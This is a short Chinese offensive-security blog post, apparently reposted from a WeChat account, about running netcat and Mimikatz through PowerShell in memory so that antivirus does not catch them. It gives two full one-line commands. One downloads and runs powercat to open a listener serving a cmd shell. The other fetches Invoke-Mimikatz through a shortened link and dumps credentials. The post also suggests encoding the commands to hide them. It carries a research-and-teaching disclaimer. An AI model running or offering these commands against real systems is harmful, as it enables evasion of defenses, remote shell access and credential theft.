前言
大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。
正文
渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。
ps版nc链接如下:
https://github.com/besimorhino/powercat
可以本地执行,也可以远程执行,远程执行命令如下:
powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"
然后远程连接执行命令即可
当然,如果嫌弃该命令太暴露,可以对其进行编码
mimikatz密码抓取同理
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
原文始发于微信公众号(中国白客联盟):powershell运行netcat
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论